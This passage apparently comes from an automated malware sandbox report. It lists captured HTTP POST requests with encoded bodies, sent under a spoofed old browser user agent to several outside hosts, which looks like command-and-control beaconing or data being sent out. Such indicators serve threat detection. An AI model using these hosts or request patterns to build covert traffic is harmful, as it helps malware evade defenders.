4c 46 57 4a 68 62 34 6f 71 59 4c 56 41 38 6e 2f 75 32 73 44 36 62 7a 6a 61 4f 72 41 78 4d 51 77 49 37 47 4d 44 41 79 37 69 30 75 37 75 45 35 75 7a 79 75 6d 76 7a 47 35 6a 67 44 67 34 75 51 6d 77 47 44 53 4e 68 66 36 47 58 73 6b 68 44 31 30 33 68 53 55 64 39 59 44 4a 31 66 6f 53 42 4e 36 6d 7a 52 71 6a 70 6c 56 37 67 52 47 53 4f 53 56 74 41 2f 35 66 62 4f 74 52 79 78 4e 31 51 32 44 79 76 4c 5a 6d 78 68 Data Ascii: 66e49IYUpByQBn1JoWIHEqnfUa7mTFBaGnnDWwoczgmH2Ukw9D71+zatIq0QO5lnGYh0AaxaSpToT3gL/M+Pl+jEgTva+BzmwuMaBitcklonrsIbtXMHzwij9UqNTUb6LlVYytXmeuGFY2808fRvZfFFb528ph95DsXB742oraVZox1RsayQ7sZFsMV8iglNPt752n6e+ybpyg5YVj8CpdonzoBsckJZ5MTdmDuSWHHkejtAwnsoMPybC576Jl7P7D2HrB/aEYMIcHpvZS1DodmYMcm1yyRXXV1JaJWAeNpOZ8fNBAYQL2Sd10BDXrlpJ7/pC9A6KZEiiacrjdSIKpII4cnGmLDXY2p9gcKwWXYGUQvH27EFgNGhpX2Equ52xfX28IadKi8IfrceuW7WxBKf6MkduLFWJhb4oqYLVA8n/u2sD6bzjaOrAxMQwI7GMDAy7i0u7uE5uzyumvzG5jgDg4uQmwGDSNhf6GXskhD103hSUd9YDJ1foSBN6mzRqjplV7gRGSOSVtA/5fbOtRyxN1Q2DyvLZmxh
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cokocoko.comCache-Control: no-cacheData Raw: 36 36 65 34 39 49 59 55 70 42 79 51 42 6e 31 4a 6f 57 49 48 45 71 6e 66 55 61 37 6d 54 46 42 61 47 6e 6e 44 57 77 6f 63 7a 67 6d 48 32 55 6b 77 39 44 37 31 2b 7a 61 74 49 71 30 51 4f 35 6c 6e 47 59 68 30 41 61 78 61 53 70 54 6f 54 33 67 4c 2f 4d 2b 50 6c 2b 6a 45 67 54 76 61 2b 42 7a 6d 77 75 4d 61 42 69 74 63 6b 6c 6f 6e 72 73 49 62 74 58 4d 48 7a 77 69 6a 39 55 71 4e 54 55 62 36 4c 6c 56 59 79 74 58 6d 65 75 47 46 59 32 38 30 38 66 52 76 5a 66 46 46 62 35 32 38 70 68 39 35 44 73 58 42 37 34 32 6f 72 61 56 5a 6f 78 31 52 73 61 79 51 37 73 5a 46 73 4d 56 38 69 67 6c 4e 50 74 37 35 32 6e 36 65 2b 79 62 70 79 67 35 59 56 6a 38 43 70 64 6f 6e 7a 6f 42 73 63 6b 4a 5a 35 4d 54 64 6d 44 75 53 57 48 48 6b 65 6a 74 41 77 6e 73 6f 4d 50 79 62 43 35 37 36 4a 6c 37 50 37 44 32 48 72 42 2f 61 45 59 4d 49 63 48 70 76 5a 53 31 44 6f 64 6d 59 4d 63 6d 31 79 79 52 58 58 56 31 4a 61 4a 57 41 65 4e 70 4f 5a 38 66 4e 42 41 59 51 4c 32 53 64 31 30 42 44 58 72 6c 70 4a 37 2f 70 43 39 41 36 4b 5a 45 69 69 61 63 72 6a 64 53 49 4b 70 49 49 34 63 6e 47 6d 4c 44 58 59 32 70 39 67 63 4b 77 57 58 59 47 55 51 76 48 32 37 45 46 67 4e 47 68 70 58 32 45 71 75 35 32 78 66 58 32 38 49 61 64 4b 69 38 49 66 72 63 65 75 57 37 57 78 42 4b 66 36 4d 6b 64 75 4c 46 57 4a 68 62 34 6f 71 59 4c 56 41 38 6e 2f 75 32 73 44 36 62 7a 6a 61 4f 72 41 78 4d 51 77 49 37 47 4d 44 41 79 37 69 30 75 37 75 45 35 75 7a 79 75 6d 76 7a 47 35 6a 67 44 67 34 75 51 6d 77 47 44 53 4e 68 66 36 47 58 73 6b 68 44 31 30 33 68 53 55 64 39 59 44 4a 31 66 6f 53 42 4e 36 6d 7a 52 71 6a 70 6c 56 37 67 52 47 53 4f 53 56 74 41 2f 35 66 62 4f 74 52 79 78 4e 31 51 32 44 79 76 4c 5a 6d 78 68 Data Ascii: 66e49IYUpByQBn1JoWIHEqnfUa7mTFBaGnnDWwoczgmH2Ukw9D71+zatIq0QO5lnGYh0AaxaSpToT3gL/M+Pl+jEgTva+BzmwuMaBitcklonrsIbtXMHzwij9UqNTUb6LlVYytXmeuGFY2808fRvZfFFb528ph95DsXB742oraVZox1RsayQ7sZFsMV8iglNPt752n6e+ybpyg5YVj8CpdonzoBsckJZ5MTdmDuSWHHkejtAwnsoMPybC576Jl7P7D2HrB/aEYMIcHpvZS1DodmYMcm1yyRXXV1JaJWAeNpOZ8fNBAYQL2Sd10BDXrlpJ7/pC9A6KZEiiacrjdSIKpII4cnGmLDXY2p9gcKwWXYGUQvH27EFgNGhpX2Equ52xfX28IadKi8IfrceuW7WxBKf6MkduLFWJhb4oqYLVA8n/u2sD6bzjaOrAxMQwI7GMDAy7i0u7uE5uzyumvzG5jgDg4uQmwGDSNhf6GXskhD103hSUd9YDJ1foSBN6mzRqjplV7gRGSOSVtA/5fbOtRyxN1Q2DyvLZmxh
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.speelhal.netCache-Control: no-cacheData Raw: 30 67 56 31 4b 45 39 49 62 52 33 4e 52 52 53 7a 37 68 6d 43 56 56 68 4c 75 65 54 6c 53 73 4c 57 38 7a 52 31 35 6e 36 36 4e 78 49 59 61 6e 39 51 47 6c 62 41 6c 52 33 35 50 5a 79 61 61 35 67 6b 55 69 6b 46 36 57 6a 4f 52 7a 68 4f 69 66 41 2b 6a 64 6d 2f 47 2f 2f 63 50 73 6c 67 52 4e 66 4a 36 6f 64 6c 61 72 6d 54 6c 79 6b 39 4e 63 75 70 65 35 77 2b 39 33 35 47 37 44 67 5a 7a 36 6d 58 6d 4e 33 63 43 74 44 76 74 77 36 59 67 67 72 45 33 34 65 36 77 63 35 72 36 70 6b 54 67 76 67 51 65 49 5a 51 6f 53 38 67 66 6d 57 69 58 61 54 6b 79 78 4d 46 6b 78 78 4a 2b 43 53 43 78 63 63 67 41 2b 35 41 74 58 51 45 31 49 46 69 34 48 79 67 78 30 32 62 69 42 33 74 73 41 6d 6e 2b 57 4c 66 55 75 41 63 38 30 41 50 41 68 6a 67 2b 4c 63 74 53 59 79 42 4c 68 55 4c 38 57 70 75 4b 2f 38 6c 76 78 49 59 35 6c 64 75 5a 44 4f 54 6d 38 48 52 37 72 76 56 68 74 35 79 4a 6a 52 6e 2f 6b 6d 42 37 4d 7a 2f 63 59 56 37 6a 2f 51 7a 68 78 69 49 62 55 71 6b 43 70 47 77 6b 4e 68 2b 76 66 59 70 6d 62 43 52 68 61 56 4d 54 71 39 34 35 49 44 35 71 2b 58 6c 47 53 34 36 6e 49 54 61 75 30 45 46 30 54 4b 52 4a 6c 57 6a 70 72 76 68 54 44 35 2f 43 31 44 74 6b 58 47 30 61 78 44 4d 44 42 32 4f 6f 32 64 73 2f 56 30 71 32 31 4a 48 4f 46 36 61 5a 30 77 38 33 6d 46 47 73 52 75 49 76 50 7a 39 38 33 4c 35 57 48 65 63 68 6d 61 2b 4d 35 35 4b 61 75 66 6b 69 2f 2b 58 57 6a 65 58 2b 30 4c 55 56 4d 42 36 6b 4a 4f 63 4c 4b 6d 46 58 47 52 50 55 6e 68 68 75 59 48 57 49 4b 67 47 4a 7a 63 76 71 67 62 69 49 74 74 6a 6c 70 58 6b 31 69 5a 2f 41 6e 4c 44 73 58 2b 55 31 47 61 41 55 69 44 41 59 45 6c 6e 56 73 49 65 4e 73 4b 6c 6c 52 31 53 6f 38 42 74 37 64 72 63 4d 55 67 65 Data Ascii: 0gV1KE9IbR3NRRSz7hmCVVhLueTlSsLW8zR15n66NxIYan9QGlbAlR35PZyaa5gkUikF6WjORzhOifA+jdm/G//cPslgRNfJ6odlarmTlyk9Ncupe5w+935G7DgZz6mXmN3cCtDvtw6YggrE34e6wc5r6pkTgvgQeIZQoS8gfmWiXaTkyxMFkxxJ+CSCxccgA+5AtXQE1IFi4Hygx02biB3tsAmn+WLfUuAc80APAhjg+LctSYyBLhUL8WpuK/8lvxIY5lduZDOTm8HR7rvVht5yJjRn/kmB7Mz/cYV7j/QzhxiIbUqkCpGwkNh+vfYpmbCRhaVMTq945ID5q+XlGS46nITau0EF0TKRJlWjprvhTD5/C1DtkXG0axDMDB2Oo2ds/V0q21JHOF6aZ0w83mFGsRuIvPz983L5WHechma+M55Kaufki/+XWjeX+0LUVMB6kJOcLKmFXGRPUnhhuYHWIKgGJzcvqgbiIttjlpXk1iZ/AnLDsX+U1GaAUiDAYElnVsIeNsKllR1So8Bt7drcMUge
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.findbc.comCache-Control: no-cacheData Raw: 6e 62 65 4b 6a 77 6f 6e 4f 42 34 32 79 6e 68 4d 62 65 72 51 39 4d 32 45 6d 64 69 36 65 39 79 52 33 74 47 37 51 53 54 30 64 4c 42 6b 54 4f 56 75 75 57 4a 32 2b 6b 65 69 43 53 75 72 61 56 2f 57 74 62 4d 74 57 5a 70 65 38 2f 39 65 76 34 30 73 74 2f 64 6a 50 52 4b 76 6f 57 69 34 51 71 61 71 41 74 36 75 62 51 51 4d 59 2b 55 48 6c 48 58 77 6c 38 6f 36 43 67 65 52 4a 6b 61 56 2b 33 48 76 77 42 61 59 77 55 6a 49 63 7a 4d 33 59 57 6a 57 69 49 53 37 51 43 75 33 36 47 74 75 68 54 37 2b 32 59 6d 53 65 4b 50 6e 67 47 75 56 67 76 4a 41 75 53 34 43 6f 61 65 39 76 73 5a 69 4e 41 67 48 53 41 49 36 78 65 65 42 30 4b 4e 41 6f 48 64 6a 2f 6d 71 79 31 78 6c 53 6d 6f 48 66 39 4a 61 4b 76 69 2b 57 57 63 4d 56 70 58 4e 4d 4c 53 6c 6a 4d 4b 76 70 52 43 2f 6e 4d 53 50 67 53 42 64 61 71 35 73 33 6f 2f 4d 70 75 2f 4a 42 37 54 69 78 46 6b 78 48 64 59 63 52 5a 6e 44 56 58 58 57 42 69 37 63 6d 56 73 61 64 32 66 54 4f 65 78 64 2b 58 52 49 73 72 58 56 4b 7a 69 36 41 53 6c 62 6c 68 53 32 2b 32 74 34 34 58 63 4d 6f 66 78 6d 6c 79 42 61 73 67 39 74 4f 36 4d 58 4f 31 4f 70 76 77 69 61 52 37 54 47 6f 64 43 7a 43 73 66 6d 6a 4f 41 78 30 74 72 78 41 4a 35 6e 67 52 68 4f 58 68 67 59 69 78 2b 30 55 57 4d 6d 39 57 45 5a 4c 4c 50 61 70 47 76 6d 2f 6a 6d 7a 73 52 34 52 69 6d 78 69 76 42 34 48 79 32 43 42 6e 72 57 43 66 38 74 67 74 39 6f 51 65 4d 35 57 43 54 67 4c 43 5a 73 6e 68 2b 7a 6e 62 6a 6e 55 74 6f 4a 64 4e 6f 4a 2b 63 47 50 74 4c 65 45 55 55 33 6a 31 78 63 61 6f 41 53 46 53 70 65 49 45 54 76 66 72 42 70 6f 69 51 71 6f 2f 78 56 39 51 55 72 31 56 36 34 59 4e 36 38 76 30 5a 62 56 6b 33 6b 35 61 42 64 37 47 63 4d 48 31 57 36 30 58 41 74 52 2b 73 62 41 4e 48 Data Ascii: nbeKjwonOB42ynhMberQ9M2Emdi6e9yR3tG7QST0dLBkTOVuuWJ2+keiCSuraV/WtbMtWZpe8/9ev40st/djPRKvoWi4QqaqAt6ubQQMY+UHlHXwl8o6CgeRJkaV+3HvwBaYwUjIczM3YWjWiIS7QCu36GtuhT7+2YmSeKPngGuVgvJAuS4Coae9vsZiNAgHSAI6xeeB0KNAoHdj/mqy1xlSmoHf9JaKvi+WWcMVpXNMLSljMKvpRC/nMSPgSBdaq5s3o/Mpu/JB7TixFkxHdYcRZnDVXXWBi7cmVsad2fTOexd+XRIsrXVKzi6ASlblhS2+2t44XcMofxmlyBasg9tO6MXO1OpvwiaR7TGodCzCsfmjOAx0trxAJ5ngRhOXhgYix+0UWMm9WEZLLPapGvm/jmzsR4RimxivB4Hy2CBnrWCf8tgt9oQeM5WCTgLCZsnh+znbjnUtoJdNoJ+cGPtLeEUU3j1xcaoASFSpeIETvfrBpoiQqo/xV9QUr1V64YN68v0ZbVk3k5aBd7GcMH1W60XAtR+sbANH
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.findbc.comCache-Control: no-cacheCookie: caf_ipaddr=10.116.88.58; country=; city=""; expiry_partner=Data Raw: 6e 62 65 4b 6a 77 6f 6e 4f 42 34 32 79 6e 68 4d 62 65 72 51 39 4d 32 45 6d 64 69 36 65 39 79 52 33 74 47 37 51 53 54 30 64 4c 42 6b 54 4f 56 75 75 57 4a 32 2b 6b 65 69 43 53 75 72 61 56 2f 57 74 62 4d 74 57 5a 70 65 38 2f 39 65 76 34 30 73 74 2f 64 6a 50 52 4b 76 6f 57 69 34 51 71 61 71 41 74 36 75 62 51 51 4d 59 2b 55 48 6c 48 58 77 6c 38 6f 36 43 67 65 52 4a 6b 61 56 2b 33 48 76 77 42 61 59 77 55 6a 49 63 7a 4d 33 59 57 6a 57 69 49 53 37 51 43 75 33 36 47 74 75 68 54 37 2b 32 59 6d 53 65 4b 50 6e 67 47 75 56 67 76 4a 41 75 53 34 43 6f 61 65 39 76 73 5a 69 4e 41 67 48 53 41 49 36 78 65 65 42 30 4b 4e 41 6f 48 64 6a 2f 6d 71 79 31 78 6c 53 6d 6f 48 66 39 4a 61 4b 76 69 2b 57 57 63 4d 56 70 58 4e 4d 4c 53 6c 6a 4d 4b 76 70 52 43 2f 6e 4d 53 50 67 53 42 64 61 71 35 73 33 6f 2f 4d 70 75 2f 4a 42 37 54 69 78 46 6b 78 48 64 59 63 52 5a 6e 44 56 58 58 57 42 69 37 63 6d 56 73 61 64 32 66 54 4f 65 78 64 2b 58 52 49 73 72 58 56 4b 7a 69 36 41 53 6c 62 6c 68 53 32 2b 32 74 34 34 58 63 4d 6f 66 78 6d 6c 79 42 61 73 67 39 74 4f 36 4d 58 4f 31 4f 70 76 77 69 61 52 37 54 47 6f 64 43 7a 43 73 66 6d 6a 4f 41 78 30 74 72 78 41 4a 35 6e 67 52 68 4f 58 68 67 59 69 78 2b 30 55 57 4d 6d 39 57 45 5a 4c 4c 50 61 70 47 76 6d 2f 6a 6d 7a 73 52 34 52 69 6d 78 69 76 42 34 48 79 32 43 42 6e 72 57 43 66 38 74 67 74 39 6f 51 65 4d 35 57 43 54 67 4c 43 5a 73 6e 68 2b 7a 6e 62 6a 6e 55 74 6f 4a 64 4e 6f 4a 2b 63 47 50 74 4c 65 45 55 55 33 6a 31 78 63 61 6f 41 53 46 53 70 65 49 45 54 76 66 72 42 70 6f 69 51 71 6f 2f 78 56 39 51 55 72 31 56 36 34 59 4e 36 38 76 30 5a 62 56 6b 33 6b 35 61 42 64 37 47 63 4d 48 31 57 36 30 58 41 74 52 2b 73 62 41 4e 48 Data Ascii: nbeKjwonOB42ynhMberQ9M2Emdi6e9yR3tG7QST0dLBkTOVuuWJ2+keiCSuraV/WtbMtWZpe8/9ev40st/djPRKvoWi4QqaqAt6ubQQMY+UHlHXwl8o6CgeRJkaV+3HvwBaYwUjIczM3YWjWiIS7QCu36GtuhT7+2YmSeKPngGuVgvJAuS4Coae9vsZiNAgHSAI6xeeB0KNAoHdj/mqy1xlSmoHf9JaKvi+WWcMVpXNMLSljMKvpRC/nMSPgSBdaq5s3o/Mpu/JB7TixFkxHdYcRZnDVXXWBi7cmVsad2fTOexd+XRIsrXVKzi6ASlblhS2+2t44XcMofxmlyBasg9tO6MXO1OpvwiaR7TGodCzCsfmjOAx0trxAJ5ngRhOXhgYix+0UWMm9WEZLLPapGvm/jmzsR4RimxivB4Hy2CBnrWCf8tgt9oQeM5WCTgLCZsnh+znbjnUtoJdNoJ+cGPtLeEUU3j1xcaoASFSpeIETvfrBpoiQqo/xV9QUr1V64YN68v0ZbVk3k5aBd7GcMH1W60XAtR+sbANH
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.c9dd.comCache-Control: no-cacheData Raw: 73 38 53 39 36 31 30 70 77 42 37 30 2f 34 6c 77 6c 42 76 42 5a 70 62 68 59 41 6f 4c 78 4d 65 58 34 51 38 59 54 58 76 51 32 65 4d 46 78 31 4e 47 38 71 76 4f 66 30 6d 71 4d 69 47 6a 54 6d 6c 36 5a 6a 37 72 31 69 36 59 6e 32 67 36 63 2f 6c 49 61 77 7a 66 63 59 6d 4e 4f 51 42 4c 67 54 33 45 67 55 73 38 50 2f 4d 34 45 33 77 76 65 58 34 33 41 73 36 63 52 79 66 75 72 78 39 79 33 4e 56 39 5a 54 2f 59 55 35 4e 48 79 4e 30 30 70 66 31 2f 79 4c 67 78 39 76 36 70 57 46 52 5a 57 61 62 44 41 6c 35 5a 35 46 41 49 4e 31 48 4e 30 6b 51 46 73 37 4b 79 4b 64 52 56 31 78 38 66 47 46 6c 4f 31 61 32 37 30 42 6e 6f 76 4b 73 32 32 55 76 46 79 70 68 59 41 66 45 67 51 47 31 33 58 37 38 34 59 36 79 6d 5a 6c 42 48 71 43 56 35 30 41 47 33 72 65 48 4f 42 33 36 33 52 67 62 6e 7a 44 65 59 79 2f 50 4c 2b 53 44 76 39 33 67 69 57 47 72 58 50 37 61 33 50 50 58 37 30 78 76 2b 51 43 4c 6e 36 6d 38 2b 7a 2f 71 75 64 4a 39 39 6f 38 4b 50 30 65 35 42 52 42 6c 59 65 78 57 30 35 63 57 32 2f 68 31 6e 75 42 74 49 37 44 74 39 34 74 30 70 53 5a 78 33 6d 48 45 6e 4b 4c 4b 73 54 54 58 55 2b 64 4d 49 39 2b 38 6e 4d 65 5a 5a 2f 34 74 59 35 61 6a 65 52 45 44 7a 77 47 35 44 46 31 50 62 4e 5a 57 70 79 4b 56 5a 41 43 45 4d 32 44 64 64 54 31 4f 67 4b 65 2f 78 66 31 39 32 37 7a 4b 72 4f 4e 4b 32 4f 55 6c 72 4c 67 44 4f 43 75 39 39 6e 6e 73 4f 42 2b 38 2b 43 50 4f 6d 78 4a 4b 32 59 30 2b 64 74 45 6d 4f 6b 72 46 42 41 36 58 4d 61 5a 39 35 65 31 6d 43 6e 4f 6b 66 75 42 38 49 54 66 4f 45 4c 31 72 36 4a 73 42 66 30 37 74 6b 47 48 76 70 34 71 6b 44 41 6f 4f 41 59 36 70 37 70 73 75 67 2b 71 38 56 7a 6a 41 35 2b 76 6d 4a 7a 4e 51 47 30 77 7a 43 39 44 48 4f 57 74 75 6e 32 74 63 59 78 76 68 39 46 43 57 6d Data Ascii: s8S9610pwB70/4lwlBvBZpbhYAoLxMeX4Q8YTXvQ2eMFx1NG8qvOf0mqMiGjTml6Zj7r1i6Yn2g6c/lIawzfcYmNOQBLgT3EgUs8P/M4E3wveX43As6cRyfurx9y3NV9ZT/YU5NHyN00pf1/yLgx9v6pWFRZWabDAl5Z5FAIN1HN0kQFs7KyKdRV1x8fGFlO1a270BnovKs22UvFyphYAfEgQG13X784Y6ymZlBHqCV50AG3reHOB363RgbnzDeYy/PL+SDv93giWGrXP7a3PPX70xv+QCLn6m8+z/qudJ99o8KP0e5BRBlYexW05cW2/h1nuBtI7Dt94t0pSZx3mHEnKLKsTTXU+dMI9+8nMeZZ/4tY5ajeREDzwG5DF1PbNZWpyKVZACEM2DddT1OgKe/xf1927zKrONK2OUlrLgDOCu99nnsOB+8+CPOmxJK2Y0+dtEmOkrFBA6XMaZ95e1mCnOkfuB8ITfOEL1r6JsBf07tkGHvp4qkDAoOAY6p7psug+q8VzjA5+vmJzNQG0wzC9DHOWtun2tcYxvh9FCWm
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.medius.siCache-Control: no-cacheData Raw: 33 66 30 69 69 58 69 34 49 42 2b 65 78 38 42 4d 2b 79 46 51 33 6d 73 53 64 62 6a 41 62 45 58 5a 4c 4c 4f 75 4f 78 5a 39 30 59 50 5a 36 32 49 72 56 43 41 76 41 4a 4c 75 6e 71 52 77 4a 36 4f 56 58 36 43 4c 44 68 47 73 4b 71 4b 43 4c 4b 6a 63 48 4d 46 4e 62 65 61 7a 72 32 41 61 78 59 70 32 6d 33 6f 75 31 33 41 56 33 41 6f 36 63 5a 35 30 5a 70 72 74 33 4a 54 77 41 56 35 44 6c 62 59 66 56 61 52 79 73 49 45 4d 74 61 53 69 79 45 76 63 41 57 49 47 4c 50 73 77 4a 70 66 2b 6e 48 6f 4c 61 4c 31 70 63 4a 2b 68 6d 79 4c 62 49 77 6c 31 43 44 46 7a 54 6e 41 31 6b 71 4d 4e 4e 51 4d 63 41 4b 6f 37 79 58 73 35 75 62 4b 65 35 35 2f 53 6b 39 2f 77 42 51 59 69 2b 35 52 5a 56 44 70 6b 7a 32 47 38 47 56 49 57 52 41 64 62 56 65 36 34 48 69 65 54 4a 2f 5a 6b 57 72 73 48 79 45 48 4d 37 55 79 41 55 51 53 56 53 6e 6d 4f 31 47 6e 30 52 68 57 56 36 77 70 68 2b 2f 57 61 64 53 46 43 52 61 6a 76 56 47 47 6a 77 4c 73 4a 63 76 75 50 74 67 54 65 50 59 75 6c 63 73 33 37 71 41 75 2b 50 79 50 72 55 31 78 74 5a 51 31 34 52 48 54 6b 66 70 66 78 6e 72 46 57 6e 41 52 49 49 4f 4b 75 46 4b 34 38 31 47 57 33 49 6d 73 48 69 39 54 31 46 66 67 6f 62 77 4e 53 69 34 53 41 46 63 62 6c 50 55 6d 43 61 79 74 33 7a 51 65 59 75 41 77 70 58 33 65 4f 5a 43 2b 79 66 47 6f 77 69 57 4c 52 6a 4f 54 73 6e 69 53 69 68 61 68 47 74 79 30 69 31 65 44 6b 73 49 64 4a 53 69 63 61 62 45 38 35 42 52 78 61 54 35 4b 75 31 43 4b 51 50 34 67 41 77 36 67 34 36 30 35 55 58 69 35 55 54 6e 42 43 4f 53 4f 75 50 69 45 58 35 6d 32 62 48 66 50 75 61 6c 6b 50 52 30 6b 35 41 2b 79 49 4f 4e 6d 70 79 48 48 75 62 44 55 64 52 43 2b 64 4f 6d 7a 33 76 56 53 4b 38 79 56 68 4c 4e 68 59 4e 61 58 56 61 48 30 3d Data Ascii: 3f0iiXi4IB+ex8BM+yFQ3msSdbjAbEXZLLOuOxZ90YPZ62IrVCAvAJLunqRwJ6OVX6CLDhGsKqKCLKjcHMFNbeazr2AaxYp2m3ou13AV3Ao6cZ50Zprt3JTwAV5DlbYfVaRysIEMtaSiyEvcAWIGLPswJpf+nHoLaL1pcJ+hmyLbIwl1CDFzTnA1kqMNNQMcAKo7yXs5ubKe55/Sk9/wBQYi+5RZVDpkz2G8GVIWRAdbVe64HieTJ/ZkWrsHyEHM7UyAUQSVSnmO1Gn0RhWV6wph+/WadSFCRajvVGGjwLsJcvuPtgTePYulcs37qAu+PyPrU1xtZQ14RHTkfpfxnrFWnARIIOKuFK481GW3ImsHi9T1FfgobwNSi4SAFcblPUmCayt3zQeYuAwpX3eOZC+yfGowiWLRjOTsniSihahGty0i1eDksIdJSicabE85BRxaT5Ku1CKQP4gAw6g4605UXi5UTnBCOSOuPiEX5m2bHfPualkPR0k5A+yIONmpyHHubDUdRC+dOmz3vVSK8yVhLNhYNaXVaH0=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.medius.siCache-Control: no-cacheData Raw: 33 66 30 69 69 58 69 34 49 42 2b 65 78 38 42 4d 2b 79 46 51 33 6d 73 53 64 62 6a 41 62 45 58 5a 4c 4c 4f 75 4f 78 5a 39 30 59 50 5a 36 32 49 72 56 43 41 76 41 4a 4c 75 6e 71 52 77 4a 36 4f 56 58 36 43 4c 44 68 47 73 4b 71 4b 43 4c 4b 6a 63 48 4d 46 4e 62 65 61 7a 72 32 41 61 78 59 70 32 6d 33 6f 75 31 33 41 56 33 41 6f 36 63 5a 35 30 5a 70 72 74 33 4a 54 77 41 56 35 44 6c 62 59 66 56 61 52 79 73 49 45 4d 74 61 53 69 79 45 76 63 41 57 49 47 4c 50 73 77 4a 70 66 2b 6e 48 6f 4c 61 4c 31 70 63 4a 2b 68 6d 79 4c 62 49 77 6c 31 43 44 46 7a 54 6e 41 31 6b 71 4d 4e 4e 51 4d 63 41 4b 6f 37 79 58 73 35 75 62 4b 65 35 35 2f 53 6b 39 2f 77 42 51 59 69 2b 35 52 5a 56 44 70 6b 7a 32 47 38 47 56 49 57 52 41 64 62 56 65 36 34 48 69 65 54 4a 2f 5a 6b 57 72 73 48 79 45 48 4d 37 55 79 41 55 51 53 56 53 6e 6d 4f 31 47 6e 30 52 68 57 56 36 77 70 68 2b 2f 57 61 64 53 46 43 52 61 6a 76 56 47 47 6a 77 4c 73 4a 63 76 75 50 74 67 54 65 50 59 75 6c 63 73 33 37 71 41 75 2b 50 79 50 72 55 31 78 74 5a 51 31 34 52 48 54 6b 66 70 66 78 6e 72 46 57 6e 41 52 49 49 4f 4b 75 46 4b 34 38 31 47 57 33 49 6d 73 48 69 39 54 31 46 66 67 6f 62 77 4e 53 69 34 53 41 46 63 62 6c 50 55 6d 43 61 79 74 33 7a 51 65 59 75 41 77 70 58 33 65 4f 5a 43 2b 79 66 47 6f 77 69 57 4c 52 6a 4f 54 73 6e 69 53 69 68 61 68 47 74 79 30 69 31 65 44 6b 73 49 64 4a 53 69 63 61 62 45 38 35 42 52 78 61 54 35 4b 75 31 43 4b 51 50 34 67 41 77 36 67 34 36 30 35 55 58 69 35 55 54 6e 42 43 4f 53 4f 75 50 69 45 58 35 6d 32 62 48 66 50 75 61 6c 6b 50 52 30 6b 35 41 2b 79 49 4f 4e 6d 70 79 48 48 75 62 44 55 64 52 43 2b 64 4f 6d 7a 33 76 56 53 4b 38 79 56 68 4c 4e 68 59 4e 61 58 56 61 48 30 3d Data Ascii: 3f0iiXi4IB+ex8BM+yFQ3msSdbjAbEXZLLOuOxZ90YPZ62IrVCAvAJLunqRwJ6OVX6CLDhGsKqKCLKjcHMFNbeazr2AaxYp2m3ou13AV3Ao6cZ50Zprt3JTwAV5DlbYfVaRysIEMtaSiyEvcAWIGLPswJpf+nHoLaL1pcJ+hmyLbIwl1CDFzTnA1kqMNNQMcAKo7yXs5ubKe55/Sk9/wBQYi+5RZVDpkz2G8GVIWRAdbVe64HieTJ/ZkWrsHyEHM7UyAUQSVSnmO1Gn0RhWV6wph+/WadSFCRajvVGGjwLsJcvuPtgTePYulcs37qAu+PyPrU1xtZQ14RHTkfpfxnrFWnARIIOKuFK481GW3ImsHi9T1FfgobwNSi4SAFcblPUmCayt3zQeYuAwpX3eOZC+yfGowiWLRjOTsniSihahGty0i1eDksIdJSicabE85BRxaT5Ku1CKQP4gAw6g4605UXi5UTnBCOSOuPiEX5m2bHfPualkPR0k5A+yIONmpyHHubDUdRC+dOmz3vVSK8yVhLNhYNaXVaH0=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.item-pr.comCache-Control: no-cacheData Raw: 43 63 75 6d 51 70 66 47 49 68 50 36 65 79 56 70 68 6a 4d 53 64 65 43 45 71 32 72 4e 47 74 73 71 75 36 73 39 44 79 4c 7a 30 36 49 55 41 32 58 77 63 74 7a 45 62 6b 38 64 79 71 31 73 6b 43 56 42 6a 44 57 64 76 4b 74 2f 62 79 49 31 7a 78 38 48 2b 72 57 63 67 49 37 38 71 70 36 66 6f 73 41 59 32 61 4e 4e 57 50 55 36 42 76 34 49 6a 49 70 4e 71 49 42 45 37 51 66 78 36 31 69 30 4f 6e 56 37 71 33 42 35 4c 43 63 35 39 77 6a 54 42 69 76 75 2b 78 65 45 48 41 72 51 75 44 50 34 44 55 49 32 59 6f 75 49 4e 66 6f 4e 37 55 35 66 6a 6f 78 59 6c 2f 37 47 6f 70 44 6d 61 59 4f 37 76 62 58 32 49 42 46 67 30 37 72 70 63 34 2f 30 78 4c 4e 53 64 74 58 63 58 4b 67 6e 41 70 37 55 77 5a 51 59 6c 5a 66 4c 2f 61 41 4e 44 47 58 4d 52 33 47 6a 57 6a 69 42 4d 6d 57 4c 33 4e 42 55 31 64 37 6a 4a 64 4c 39 37 31 59 2b 32 50 6f 53 2f 67 42 70 72 77 6d 6e 52 61 6c 62 44 4f 55 6d 4a 4c 70 2b 54 47 63 6d 76 76 70 6a 75 54 4f 38 43 4f 6c 74 59 41 38 54 6a 68 46 51 68 44 4d 48 2b 42 45 41 73 73 41 76 38 76 69 39 6a 70 38 77 54 68 44 6f 6c 75 43 